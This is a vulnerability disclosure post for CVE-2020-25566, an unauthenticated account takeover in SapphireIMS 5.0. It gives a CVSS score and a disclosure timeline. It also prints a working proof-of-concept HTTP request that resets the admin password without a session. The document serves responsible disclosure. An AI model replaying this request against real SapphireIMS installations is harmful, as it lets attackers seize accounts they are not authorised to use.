[CVE-2020-25566] SapphireIMS: Unauthenticated account takeover

Posted on

Description

In SapphireIMS 5.0, it is possible to take over an account by sending a request to the Save_Password form as shown in POC. Notice that we do not require a JSESSIONID in this request and can reset any user’s password by changing the username to that user and password to base64(desired password).

CVSS 3.0 Base Score

9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Researcher

Tanoy Bose

POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /SapphireIMS/Save_Password HTTP/1.1
Host: 192.168.191.48
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 434
Origin: http://192.168.191.48
Connection: close
Referer: http://192.168.191.48/SapphireIMS/ChangePassword.jsp
Upgrade-Insecure-Requests: 1

username=admin&username=admin&fullName=Administrator&email=sapphireimsuser%40localhost.com&isMandatory_EmailAddress=0&cellno=&isMandatory_CellNo=0&teleno=&isMandatory_TelephoneNo=0&userpreferenceid=1&passwordDisabled=0&oldpassword=YWRtaW4%3D&newpassword=YWRtaW4x&resetDisabled=0&renewpassword=YWRtaW4x&pin=&securityPinMin=3&securityPinMax=4&question=&answer=&timezone=America%2FLos_Angeles&securityPinEnabled=1&timeZoneChangeEnabled=1

Vulnerability Tracker]

Disclosure timelines

  • 07 May, 2020 - Vendor informed; failed
  • 16 Sept, 2020 - Cert-CC and Cert-In Informed
Tanoy Bose
Namaste.
You can know about me at my portfolio.
I follow my own Vulnerability Disclosure Policy.
Most of my work is listed here.